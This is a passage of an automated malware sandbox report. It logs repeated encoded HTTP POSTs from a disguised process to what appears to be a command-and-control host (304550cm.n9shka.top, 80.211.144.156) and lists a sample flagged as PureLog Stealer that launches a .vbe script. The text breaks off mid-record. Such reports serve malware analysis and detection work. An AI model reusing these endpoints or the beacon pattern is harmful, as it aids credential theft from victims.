                                                          Sep 8, 2024 11:53:57.306859016 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:57.436763048 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:56 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          137 | 192.168.2.4 | 64827 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:53:57.560575008 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive


                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                          138         192.168.2.4  64828        80.211.144.156  80                764  C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp                            Bytes transferred  Direction  Data
                                                          Sep 8, 2024 11:53:57.583802938 CEST  319                OUT        POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 1412
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:57.933047056 CEST1412OUTData Raw: 5b 5b 59 55 5a 5b 5e 58 5c 5a 51 56 57 59 57 54 50 58 5e 50 54 55 53 46 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [[YUZ[^X\ZQVWYWTPX^PTUSFTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%[/!=>9?40Z><\$?",<0)?^6>Y+;[0/+#G X/)
                                                          Sep 8, 2024 11:53:58.277067900 CEST  25                 IN         HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:58.410808086 CEST  308                IN         HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:57 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive
                                                          Data Raw: 0d 11 26 10 30 11 3a 01 20 2e 2c 0e 2a 3f 0f 56 39 03 34 11 3e 39 39 43 3d 23 12 1c 2a 3f 31 06 3d 3b 22 1b 2b 3f 3c 59 37 31 30 02 26 25 28 5e 03 11 23 13 22 3e 39 07 2b 39 2a 58 28 21 2f 04 29 01 24 01 22 24 33 0b 20 05 2b 07 23 5e 21 0f 2b 17 3d 0f 2c 24 2e 1c 2e 0a 31 08 36 24 2d 57 0c 12 20 1b 2b 10 3b 50 23 0a 2a 05 25 3d 35 11 27 26 39 07 3e 5e 22 1c 3c 38 3a 58 25 1c 05 1d 24 03 39 5f 2b 28 2a 5d 27 00 33 59 23 3d 24 53 2d 0c 22 54 00 3d 5c 56
                                                          Data Ascii: &0: .,*?V94>99C=#*?1=;"+?<Y710&%(^#">9+9*X(!/)$"$3 +#^!+=,$..16$-W +;P#*%=5'&9>^"<8:X%$9_+(*]'3Y#=$S-"T=\V


                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                          139         192.168.2.4  64829        80.211.144.156  80                764  C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp                            Bytes transferred  Direction  Data
                                                          Sep 8, 2024 11:53:57.700756073 CEST  319                OUT        POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:58.057395935 CEST2532OUTData Raw: 5b 5a 5c 50 5a 52 5b 5e 5c 5a 51 56 57 5a 57 52 50 5a 5e 50 54 55 53 40 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [Z\PZR[^\ZQVWZWRPZ^PTUS@TRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%]81->98#V<=<?_'/Z/ 0;_!=^<6?_'$;.#G X/%
                                                          Sep 8, 2024 11:53:58.367378950 CEST  25                 IN         HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:58.571671009 CEST  158                IN         HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:58 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                          140         192.168.2.4  64830        80.211.144.156  80                764  C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp                            Bytes transferred  Direction  Data
                                                          Sep 8, 2024 11:53:58.708890915 CEST  295                OUT        POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Sep 8, 2024 11:53:59.056489944 CEST2532OUTData Raw: 5e 5c 5c 54 5a 52 5b 5e 5c 5a 51 56 57 5e 57 56 50 50 5e 5f 54 5e 53 43 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^\\TZR[^\ZQVW^WVPP^_T^SCTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&.1![>#]70Z=<?%?!]/B$$*+65[(#X$$[.;#G X/5
                                                          Sep 8, 2024 11:53:59.382931948 CEST  25                 IN         HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:59.596944094 CEST  158                IN         HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:59 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                          141         192.168.2.4  64831        80.211.144.156  80                764  C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp                            Bytes transferred  Direction  Data
                                                          Sep 8, 2024 11:53:59.734606981 CEST  319                OUT        POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:54:00.087728024 CEST2532OUTData Raw: 5b 5b 59 55 5a 5a 5b 50 5c 5a 51 56 57 5c 57 5c 50 5e 5e 51 54 59 53 44 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [[YUZZ[P\ZQVW\W\P^^QTYSDTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%\821Z*Y7 [=//%/,0)^5!Z+(34'-;#G X/
                                                          Sep 8, 2024 11:54:00.413959026 CEST  25                 IN         HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:54:00.607584000 CEST  158                IN         HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:54:00 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                          142         192.168.2.4  64832        80.211.144.156  80                764  C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp                            Bytes transferred  Direction  Data
                                                          Sep 8, 2024 11:54:00.746680975 CEST  319                OUT        POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:54:01.103444099 CEST2532OUTData Raw: 5b 5d 5c 54 5f 5f 5b 5c 5c 5a 51 56 57 5f 57 53 50 5c 5e 5f 54 5a 53 40 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: []\T__[\\ZQVW_WSP\^_TZS@TRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%^.1=Z?9'X4 (])<$Y)_/4;T0:(!)&+_'7-+#G X/1
                                                          Sep 8, 2024 11:54:01.420110941 CEST  25                 IN         HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:54:01.552289963 CEST  158                IN         HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:54:00 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                          143         192.168.2.4  64833        80.211.144.156  80                764  C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp                            Bytes transferred  Direction  Data
                                                          Sep 8, 2024 11:54:01.683679104 CEST  319                OUT        POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:54:02.042386055 CEST2532OUTData Raw: 5b 58 59 53 5f 5e 5b 5c 5c 5a 51 56 57 53 57 56 50 59 5e 5e 54 5d 53 46 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [XYS_^[\\ZQVWSWVPY^^T]SFTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%/\> 0)<^3-7?W':<"=)+5 '4.;#G X/
                                                          Sep 8, 2024 11:54:02.348670959 CEST  25                 IN         HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:54:02.476887941 CEST  158                IN         HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:54:01 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                          144         192.168.2.4  64834        80.211.144.156  80                764  C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp                            Bytes transferred  Direction  Data
                                                          Sep 8, 2024 11:54:02.616149902 CEST  319                OUT        POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:54:02.962753057 CEST2532OUTData Raw: 5b 5f 59 53 5a 5f 5b 59 5c 5a 51 56 57 59 57 53 50 50 5e 51 54 58 53 47 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [_YSZ_[Y\ZQVWYWSPP^QTXSGTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%^."-])(# 0]>Z7\0?2;<' 5>Y?&#Z'?-+#G X/)
                                                          Sep 8, 2024 11:54:03.296987057 CEST  25                 IN         HTTP/1.1 100 Continue


                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                          145         192.168.2.4  64835        80.211.144.156  80                764  C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp                            Bytes transferred  Direction  Data
                                                          Sep 8, 2024 11:54:03.422836065 CEST  319                OUT        POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 1412
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:54:03.776407957 CEST1412OUTData Raw: 5e 5c 5c 50 5a 5d 5e 5c 5c 5a 51 56 57 53 57 51 50 5f 5e 58 54 59 53 45 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^\\PZ]^\\ZQVWSWQP_^XTYSETRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%\.!>9/ 8\=<09[/<%9'5+%<'79#G X/
                                                          Sep 8, 2024 11:54:04.092274904 CEST  25                 IN         HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:54:04.290366888 CEST  308                IN         HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:54:03 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive
                                                          Data Raw: 0d 11 26 1e 26 2f 3d 5d 21 2d 38 0d 29 01 36 09 39 3d 24 58 29 5f 35 41 29 1d 12 1c 2b 3f 04 5e 2a 28 31 41 2a 5a 30 13 37 32 23 5c 25 0f 28 5e 03 11 23 58 23 2e 32 10 3e 3a 2d 07 3d 21 09 05 3e 01 3f 12 22 0a 3c 54 20 38 37 02 23 2b 3a 1a 3c 07 3a 50 2d 34 39 0b 2f 20 26 54 21 24 2d 57 0c 12 20 1a 28 10 23 53 20 55 3d 15 26 10 25 1f 24 35 29 03 2a 2b 26 50 2b 3b 32 59 25 0b 3b 56 24 03 26 00 29 2b 26 14 33 29 27 12 23 3d 24 53 2d 0c 22 54 00 3d 5c 56
                                                          Data Ascii: &&/=]!-8)69=$X)_5A)+?^*(1A*Z072#\%(^#X#.2>:-=!>?"<T 87#+:<:P-49/ &T!$-W (#S U=&%$5)*+&P+;2Y%;V$&)+&3)'#=$S-"T=\V


                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                          146         192.168.2.4  64836        80.211.144.156  80                764  C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp                            Bytes transferred  Direction  Data
                                                          Sep 8, 2024 11:54:03.553821087 CEST  319                OUT        POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:54:03.902401924 CEST2532OUTData Raw: 5e 5e 5c 53 5a 52 5e 58 5c 5a 51 56 57 53 57 5d 50 5a 5e 5e 54 5f 53 49 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^^\SZR^X\ZQVWSW]PZ^^T_SITRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%^;"!),4#;>7^$Y!_-4V0945>%?($-#G X/
                                                          Sep 8, 2024 11:54:04.226871967 CEST  25                 IN         HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:54:04.356571913 CEST  158                IN         HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:54:03 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                          147         192.168.2.4  64837        80.211.144.156  80                764  C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp                            Bytes transferred  Direction  Data
                                                          Sep 8, 2024 11:54:04.487909079 CEST  295                OUT        POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Sep 8, 2024 11:54:04.837774992 CEST2532OUTData Raw: 5b 51 5c 51 5f 5f 5e 58 5c 5a 51 56 57 53 57 53 50 5e 5e 5f 54 5d 53 46 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [Q\Q__^X\ZQVWSWSP^^_T]SFTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&81&>9\ \),+]3<5\;'4$*<">=X?83$4\:#G X/
                                                          Sep 8, 2024 11:54:05.158730030 CEST  25                 IN         HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:54:05.358500957 CEST  158                IN         HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:54:04 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                          148         192.168.2.4  64838        80.211.144.156  80                764  C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp                            Bytes transferred  Direction  Data
                                                          Sep 8, 2024 11:54:05.480218887 CEST  319                OUT        POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:54:05.841722965 CEST2532OUTData Raw: 5e 59 59 52 5f 58 5e 5f 5c 5a 51 56 57 58 57 56 50 58 5e 5d 54 5c 53 49 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^YYR_X^_\ZQVWXWVPX^]T\SITRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%Z;11=9# X)</X3?/B4$_7!>-)%,'9#G X/-
                                                          Sep 8, 2024 11:54:06.155229092 CEST  25                 IN         HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:54:06.285542011 CEST  158                IN         HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:54:05 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                          149         192.168.2.4  64839        80.211.144.156  80                764  C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp                            Bytes transferred  Direction  Data
                                                          Sep 8, 2024 11:54:06.421295881 CEST  319                OUT        POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:54:06.775216103 CEST2532OUTData Raw: 5e 5a 59 54 5f 5e 5e 58 5c 5a 51 56 57 59 57 5d 50 5d 5e 50 54 58 53 46 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^ZYT_^^X\ZQVWYW]P]^PTXSFTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%[,W>>_']#V/=('/2/+V$ 51+%,'4+.#G X/)
                                                          Sep 8, 2024 11:54:07.120095015 CEST  25                 IN         HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:54:07.254661083 CEST  158                IN         HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:54:06 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Target ID:0
                                                          Start time:05:51:41
                                                          Start date:08/09/2024
                                                          Path:C:\Users\user\Desktop\kIdT4m0aa4.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\kIdT4m0aa4.exe"
                                                          Imagebase:0xcc0000
                                                          File size:4'201'265 bytes
                                                          MD5 hash:55A2312D6062E5BAC6C5F62A0EE42FA2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1682046441.000000000708F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1681650291.000000000678C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:1
                                                          Start time:05:51:42
                                                          Start date:08/09/2024
                                                          Path:C:\Windows\SysWOW64\wscript.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\ProviderWebSavesNet\KzpapvVcbVWl7x3kYPCfes0ojKXptfYw4GAjwTs.vbe"
                                                          Imagebase:0xec0000
                                                          File size:147'456 bytes
                                                          MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:2
                                                          Start time:05:51:48
                                                          Start date:08/09/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
